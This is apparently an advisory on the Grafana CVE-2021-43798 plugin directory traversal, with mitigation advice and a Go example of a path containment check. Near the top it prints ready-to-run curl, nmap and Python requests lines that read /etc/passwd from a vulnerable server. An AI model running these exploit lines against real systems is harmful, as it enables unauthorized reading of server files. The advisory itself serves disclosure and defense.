Grafana, Directory Traversal, CVE-2021-43798 (High)


The vulnerability CVE-2021-43798 is a path traversal flaw in Grafana’s static plugin handling. The issue resides in the URL path /public/plugins/, which is used to serve static assets for installed plugins. Grafana fails to properly sanitize the `pluginId` parameter within this path. An attacker can craft a malicious HTTP request using directory traversal sequences, such as ../../../, after a legitimate plugin ID. For example, a request to `/public/plugins/alertlist/../../../../../../etc/passwd` would bypass intended restrictions. This allows the attacker to read arbitrary files from the underlying server’s filesystem by manipulating the path to traverse outside the intended plugin directory. The vulnerability is network exploitable without authentication, leading to confidentiality loss as sensitive system files can be disclosed.
Platform: Grafana
Version: 8.0.0-8.3.0

Vulnerability: Directory Traversal

Severity: High

Date: 2021-12

Prediction: Patch Available

What Undercode Says:

```bash
# --path-as-is stops curl from collapsing the ../ segments before sending the request
curl --path-as-is "http://vulnerable-host:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
```

```bash
nmap -p3000 --script http-vuln-cve2021-43798 <target>
```

```python
import requests

# Traversal sequence placed after a valid plugin ID, as described above
url = 'http://<target>:3000/public/plugins/pluginID/../../../../etc/passwd'
r = requests.get(url)
print(r.text)
```

How to Exploit:

Craft malicious HTTP request.

Use traversal sequences.

Read local files.

Protection from this CVE:

Upgrade Grafana version.

Implement web application firewall.

Restrict network access.
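The root cause described above is a resolved asset path that is never checked against the plugin directory it is supposed to stay inside. The following Go example is added here and is not Grafana's code: it contrasts a bare join (the weak pattern) with a version that rejects any cleaned path that escapes the plugin directory. The directory layout `/var/lib/grafana/plugins/alertlist` is an assumption used only for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsidePluginDir is returned when a requested asset resolves outside
// the plugin's own directory, i.e. a traversal attempt.
var ErrOutsidePluginDir = errors.New("requested path escapes plugin directory")

// unsafeAssetPath shows the weak pattern: the URL remainder is joined onto the
// plugin directory with no containment check. filepath.Join cleans the path,
// so "../" segments walk straight out of pluginDir.
func unsafeAssetPath(pluginDir, requested string) string {
	return filepath.Join(pluginDir, requested)
}

// safeAssetPath resolves the asset the same way, then verifies that the
// cleaned result is still pluginDir itself or something beneath it.
func safeAssetPath(pluginDir, requested string) (string, error) {
	root := filepath.Clean(pluginDir)
	full := filepath.Join(root, requested) // Join already applies Clean
	// Require root + separator as the prefix so a sibling directory such as
	// ".../plugins/alertlist-evil" cannot slip past a plain prefix match.
	if full != root && !strings.HasPrefix(full, root+string(filepath.Separator)) {
		return "", ErrOutsidePluginDir
	}
	return full, nil
}

func main() {
	const pluginDir = "/var/lib/grafana/plugins/alertlist" // assumed layout
	for _, req := range []string{
		"module.js",
		"img/../module.js",                    // dot-dot that stays in-tree
		"../../../../../../../../etc/passwd", // the traversal from the advisory
	} {
		fmt.Printf("unsafe: %s\n", unsafeAssetPath(pluginDir, req))
		if p, err := safeAssetPath(pluginDir, req); err != nil {
			fmt.Printf("safe:   rejected %q: %v\n", req, err)
		} else {
			fmt.Printf("safe:   %s\n", p)
		}
	}
}
```

Run it and the unsafe join prints `/etc/passwd` for the last request while the checked version rejects it; in-tree `..` segments are still served, so the check does not break legitimate relative asset references.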

Impact:

Arbitrary file read.

Information disclosure.

Sensitive data exposure.


Sources:

Reported By: www.cve.org